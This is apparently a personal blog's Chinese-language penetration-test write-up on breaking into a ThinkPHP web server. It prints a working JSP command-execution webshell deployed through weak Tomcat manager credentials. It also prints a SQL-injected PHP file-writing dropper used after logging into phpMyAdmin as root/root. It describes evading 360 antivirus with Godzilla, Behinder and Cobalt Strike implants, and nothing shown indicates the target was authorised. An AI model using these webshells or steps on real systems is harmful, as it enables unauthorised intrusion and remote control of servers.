前言
- 简单的渗透测试
开始
简单的看一下信息,发现ThinkPHP
看一看版本,3.2.3,百度搜了下,好像是可以反序列化注入,先放着,再搜集一下信息
把图片路径去掉,会发现个目录遍历,还没想到利用方式,没找到admin目录,信息越多突破口才更好找
再用nmapAutomator扫一波网站的端口信息,不错,开了3306,还有tomcat
直接去tomcat,常规的测试一下put,有可能开了readonly,但是没有,不允许
Tomcat弱口令
然后弱密码,登陆试试,惊喜,进了。可以直接war打包getshell了
其实这时还有个,就是上面指纹识别的多了一些信息,因为之前不是检测端口开放了3306吗,没想到tomcat上面会识别到phpmyadmin
管理数据库,之前用网站目录没扫出来,估计域名访问的是ip:80/xx/index.php,所以现在直接用ip:8080访问就扫出来了吧,这时能拿shell的方法又有其他的可以尝试。
先试试这个了,先添加一个一句话木马
1 | <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> |
用jar打个包,简单理解一下 c是create,v是详细的意思不知道啥单词,f是file指定创建的war
接着上传就ok了
他会把cmd.war解压成cmd/1.jsp,我们访问这个路径就可以看到了
高权限,随即我执行命令,发现被拦截了,看了看进程,发现360
接着网上搜了个大马,试试能不能绕过,同样方法,上传大马,确实有个360
上传cs免杀马,结果自己做的太大了,算了,上传哥斯拉马,哥斯拉搞起
想上传cs马,结果没权限,因为没法上传文件
过360创建用户
这里写一个自己构造的bypass360创建用户的方法,可以进去人工关360
1 | 正常来写 |
PHPmyadmin方法记录
这里回到网站,另一种方法也记录一下,好久没碰phpmyadmin,在tomcat中检查指纹的时候,爆出有phpmyadmin,我们访问看看,我还想着是不是要利用刚刚拿到的shell去找mysql密码,结果root root就进去了。弱密码tql
还是基础操作,日志getshell,简单的猜一下目录
但是访问不进去
我怀疑是被杀了,上传个冰蝎马,思路是利用file_put_contents来post传上去
1 | SELECT "<?php file_put_contents($_GET['name'],$_POST['ma']);?>" |
然后发现可以访问了,接着利用这个写入要url编码一下冰蝎马,或者哥斯拉马,这里用冰蝎了
成功连上冰蝎
这次继续上cs马,没想到上去了,我做了个木马,太大了2Mo(╥﹏╥)o,太菜了
接着执行一下就上线了
结束
我的个人博客
孤桜懶契:http://gylq.gitee.io